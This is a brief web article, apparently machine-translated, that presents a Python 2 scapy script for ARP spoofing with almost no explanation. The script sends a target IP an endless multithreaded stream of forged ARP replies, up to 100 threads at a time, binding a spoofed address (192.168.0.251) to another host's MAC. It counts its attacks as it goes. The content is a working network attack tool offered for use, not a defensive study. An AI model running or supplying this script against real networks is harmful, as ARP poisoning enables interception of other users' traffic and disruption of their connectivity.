Python sends arp spoofing attack code analysis

  • 2020-04-02 13:19:09
  • OfStack


# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,Lock,activeCount
BROADCASTMAC = getmacbyip('192.168.0.120')
class Loop(Thread):
    def __init__(self,ip):
        Thread.__init__(self)
        self.ip = ip

    def run(self):
        global BROADCASTMAC
        arp = ARP()
        arp.psrc = '192.168.0.251'
        arp.hwsrc = BROADCASTMAC
        arp.pdst = self.ip
        arp.op = 2
        sr1(arp,verbose = 0,retry = 0,timeout = 3)
class Main(Thread):
    def __init__(self,ip):
        Thread.__init__(self)
        self.ip = ip
    def run(self):
        limit = 100
        total = 0
        while True:
            if activeCount() < limit:
                Loop(self.ip).start()
                total = total + 1
            print ' It has been done so far ARP The number of attacks is zero :'+str(total)

if __name__ == '__main__':
    ip = raw_input(' Please enter to proceed ARP Attacking machine IP:')

    Main(ip = ip).start()


Related articles: